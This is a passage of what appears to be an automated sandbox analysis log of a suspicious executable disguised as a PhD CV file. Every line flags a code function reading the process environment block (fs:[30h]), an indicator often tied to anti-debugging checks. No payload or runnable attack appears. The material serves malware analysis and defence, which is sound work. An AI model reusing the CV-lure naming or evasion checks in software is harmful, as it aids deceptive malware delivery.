                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A750 mov eax, dword ptr fs:[00000030h]2_2_00F7A750
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010086A8 mov eax, dword ptr fs:[00000030h]2_2_010086A8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010086A8 mov eax, dword ptr fs:[00000030h]2_2_010086A8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FEE750 mov eax, dword ptr fs:[00000030h]2_2_00FEE750
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100A6C0 mov eax, dword ptr fs:[00000030h]2_2_0100A6C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4471B mov eax, dword ptr fs:[00000030h]2_2_00F4471B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4471B mov eax, dword ptr fs:[00000030h]2_2_00F4471B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6270D mov eax, dword ptr fs:[00000030h]2_2_00F6270D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6270D mov eax, dword ptr fs:[00000030h]2_2_00F6270D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6270D mov eax, dword ptr fs:[00000030h]2_2_00F6270D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD88FB mov eax, dword ptr fs:[00000030h]2_2_00FD88FB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F748F0 mov eax, dword ptr fs:[00000030h]2_2_00F748F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0101492D mov eax, dword ptr fs:[00000030h]2_2_0101492D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100892E mov eax, dword ptr fs:[00000030h]2_2_0100892E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100892E mov eax, dword ptr fs:[00000030h]2_2_0100892E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F408CD mov eax, dword ptr fs:[00000030h]2_2_00F408CD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F408CD mov eax, dword ptr fs:[00000030h]2_2_00F408CD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F388C8 mov eax, dword ptr fs:[00000030h]2_2_00F388C8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F388C8 mov eax, dword ptr fs:[00000030h]2_2_00F388C8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF8890 mov eax, dword ptr fs:[00000030h]2_2_00FF8890
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF8890 mov eax, dword ptr fs:[00000030h]2_2_00FF8890
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC488F mov eax, dword ptr fs:[00000030h]2_2_00FC488F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F66882 mov eax, dword ptr fs:[00000030h]2_2_00F66882
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F66882 mov eax, dword ptr fs:[00000030h]2_2_00F66882
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F66882 mov eax, dword ptr fs:[00000030h]2_2_00F66882
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E mov eax, dword ptr fs:[00000030h]2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E mov edx, dword ptr fs:[00000030h]2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E mov eax, dword ptr fs:[00000030h]2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC870 mov eax, dword ptr fs:[00000030h]2_2_00FCC870
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010129CF mov eax, dword ptr fs:[00000030h]2_2_010129CF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010129CF mov eax, dword ptr fs:[00000030h]2_2_010129CF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C819 mov eax, dword ptr fs:[00000030h]2_2_00F7C819
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C819 mov eax, dword ptr fs:[00000030h]2_2_00F7C819
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F409F0 mov eax, dword ptr fs:[00000030h]2_2_00F409F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F749F0 mov eax, dword ptr fs:[00000030h]2_2_00F749F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F749F0 mov eax, dword ptr fs:[00000030h]2_2_00F749F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F489C0 mov eax, dword ptr fs:[00000030h]2_2_00F489C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F489C0 mov eax, dword ptr fs:[00000030h]2_2_00F489C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F789B0 mov edx, dword ptr fs:[00000030h]2_2_00F789B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD69B0 mov eax, dword ptr fs:[00000030h]2_2_00FD69B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD69B0 mov eax, dword ptr fs:[00000030h]2_2_00FD69B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD69B0 mov ecx, dword ptr fs:[00000030h]2_2_00FD69B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC89A0 mov eax, dword ptr fs:[00000030h]2_2_00FC89A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C98F mov eax, dword ptr fs:[00000030h]2_2_00F7C98F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C98F mov eax, dword ptr fs:[00000030h]2_2_00F7C98F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C98F mov eax, dword ptr fs:[00000030h]2_2_00F7C98F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE0980 mov eax, dword ptr fs:[00000030h]2_2_00FE0980
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE0980 mov eax, dword ptr fs:[00000030h]2_2_00FE0980
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5096B mov eax, dword ptr fs:[00000030h]2_2_00F5096B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5096B mov eax, dword ptr fs:[00000030h]2_2_00F5096B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F64955 mov eax, dword ptr fs:[00000030h]2_2_00F64955
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F64955 mov eax, dword ptr fs:[00000030h]2_2_00F64955
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C958 mov eax, dword ptr fs:[00000030h]2_2_00F7C958
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C944 mov eax, dword ptr fs:[00000030h]2_2_00F7C944
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E94E mov eax, dword ptr fs:[00000030h]2_2_00F6E94E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F9693A mov eax, dword ptr fs:[00000030h]2_2_00F9693A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F9693A mov eax, dword ptr fs:[00000030h]2_2_00F9693A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F9693A mov eax, dword ptr fs:[00000030h]2_2_00F9693A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov ecx, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov eax, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov eax, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov eax, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F96912 mov eax, dword ptr fs:[00000030h]2_2_00F96912
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72919 mov eax, dword ptr fs:[00000030h]2_2_00F72919
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72919 mov eax, dword ptr fs:[00000030h]2_2_00F72919
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0AFF mov eax, dword ptr fs:[00000030h]2_2_00FC0AFF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0AFF mov eax, dword ptr fs:[00000030h]2_2_00FC0AFF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0AFF mov eax, dword ptr fs:[00000030h]2_2_00FC0AFF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40AED mov eax, dword ptr fs:[00000030h]2_2_00F40AED
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40AED mov eax, dword ptr fs:[00000030h]2_2_00F40AED
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40AED mov eax, dword ptr fs:[00000030h]2_2_00F40AED
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F60AEB mov eax, dword ptr fs:[00000030h]2_2_00F60AEB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F60AEB mov eax, dword ptr fs:[00000030h]2_2_00F60AEB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F60AEB mov eax, dword ptr fs:[00000030h]2_2_00F60AEB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE0AE0 mov eax, dword ptr fs:[00000030h]2_2_00FE0AE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE2AE0 mov eax, dword ptr fs:[00000030h]2_2_00FE2AE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE2AE0 mov eax, dword ptr fs:[00000030h]2_2_00FE2AE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50ACE mov eax, dword ptr fs:[00000030h]2_2_00F50ACE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50ACE mov eax, dword ptr fs:[00000030h]2_2_00F50ACE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE4AC2 mov eax, dword ptr fs:[00000030h]2_2_00FE4AC2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014B67 mov eax, dword ptr fs:[00000030h]2_2_01014B67
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF6A80 mov eax, dword ptr fs:[00000030h]2_2_00FF6A80
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC4A57 mov eax, dword ptr fs:[00000030h]2_2_00FC4A57
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC4A57 mov eax, dword ptr fs:[00000030h]2_2_00FC4A57
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6EA40 mov eax, dword ptr fs:[00000030h]2_2_00F6EA40
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6EA40 mov eax, dword ptr fs:[00000030h]2_2_00F6EA40
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FDAA40 mov eax, dword ptr fs:[00000030h]2_2_00FDAA40
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FDAA40 mov eax, dword ptr fs:[00000030h]2_2_00FDAA40
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01008BBE mov eax, dword ptr fs:[00000030h]2_2_01008BBE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01008BBE mov eax, dword ptr fs:[00000030h]2_2_01008BBE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01008BBE mov eax, dword ptr fs:[00000030h]2_2_01008BBE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01008BBE mov eax, dword ptr fs:[00000030h]2_2_01008BBE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014BE0 mov eax, dword ptr fs:[00000030h]2_2_01014BE0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7AA0E mov eax, dword ptr fs:[00000030h]2_2_00F7AA0E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7AA0E mov eax, dword ptr fs:[00000030h]2_2_00F7AA0E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE6BDE mov ebx, dword ptr fs:[00000030h]2_2_00FE6BDE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE6BDE mov eax, dword ptr fs:[00000030h]2_2_00FE6BDE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F68BD1 mov eax, dword ptr fs:[00000030h]2_2_00F68BD1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F68BD1 mov eax, dword ptr fs:[00000030h]2_2_00F68BD1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3EBC0 mov eax, dword ptr fs:[00000030h]2_2_00F3EBC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC4BC0 mov eax, dword ptr fs:[00000030h]2_2_00FC4BC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC4BC0 mov eax, dword ptr fs:[00000030h]2_2_00FC4BC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC4BC0 mov eax, dword ptr fs:[00000030h]2_2_00FC4BC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC4BC0 mov eax, dword ptr fs:[00000030h]2_2_00FC4BC0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4AB70 mov eax, dword ptr fs:[00000030h]2_2_00F4AB70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4AB70 mov eax, dword ptr fs:[00000030h]2_2_00F4AB70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4AB70 mov eax, dword ptr fs:[00000030h]2_2_00F4AB70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4AB70 mov eax, dword ptr fs:[00000030h]2_2_00F4AB70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4AB70 mov eax, dword ptr fs:[00000030h]2_2_00F4AB70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4AB70 mov eax, dword ptr fs:[00000030h]2_2_00F4AB70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46B70 mov eax, dword ptr fs:[00000030h]2_2_00F46B70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46B70 mov eax, dword ptr fs:[00000030h]2_2_00F46B70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46B70 mov eax, dword ptr fs:[00000030h]2_2_00F46B70
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF6B77 mov eax, dword ptr fs:[00000030h]2_2_00FF6B77
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F74B79 mov eax, dword ptr fs:[00000030h]2_2_00F74B79
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7CB20 mov eax, dword ptr fs:[00000030h]2_2_00F7CB20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCCB20 mov eax, dword ptr fs:[00000030h]2_2_00FCCB20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCCB20 mov eax, dword ptr fs:[00000030h]2_2_00FCCB20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCCB20 mov eax, dword ptr fs:[00000030h]2_2_00FCCB20
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48B10 mov eax, dword ptr fs:[00000030h]2_2_00F48B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48B10 mov eax, dword ptr fs:[00000030h]2_2_00F48B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48B10 mov eax, dword ptr fs:[00000030h]2_2_00F48B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50B10 mov eax, dword ptr fs:[00000030h]2_2_00F50B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50B10 mov eax, dword ptr fs:[00000030h]2_2_00F50B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50B10 mov eax, dword ptr fs:[00000030h]2_2_00F50B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50B10 mov eax, dword ptr fs:[00000030h]2_2_00F50B10
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014AE8 mov eax, dword ptr fs:[00000030h]2_2_01014AE8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6EB1C mov eax, dword ptr fs:[00000030h]2_2_00F6EB1C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3CB1E mov eax, dword ptr fs:[00000030h]2_2_00F3CB1E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6ECF3 mov eax, dword ptr fs:[00000030h]2_2_00F6ECF3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6ECF3 mov eax, dword ptr fs:[00000030h]2_2_00F6ECF3
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBCCF0 mov ecx, dword ptr fs:[00000030h]2_2_00FBCCF0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0CEE mov eax, dword ptr fs:[00000030h]2_2_00FC0CEE
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7CCD1 mov ecx, dword ptr fs:[00000030h]2_2_00F7CCD1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7CCD1 mov eax, dword ptr fs:[00000030h]2_2_00F7CCD1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7CCD1 mov eax, dword ptr fs:[00000030h]2_2_00F7CCD1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F68CDF mov eax, dword ptr fs:[00000030h]2_2_00F68CDF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F68CDF mov eax, dword ptr fs:[00000030h]2_2_00F68CDF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD2CD0 mov eax, dword ptr fs:[00000030h]2_2_00FD2CD0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD2CD0 mov eax, dword ptr fs:[00000030h]2_2_00FD2CD0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD2CD0 mov eax, dword ptr fs:[00000030h]2_2_00FD2CD0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F36CC0 mov eax, dword ptr fs:[00000030h]2_2_00F36CC0
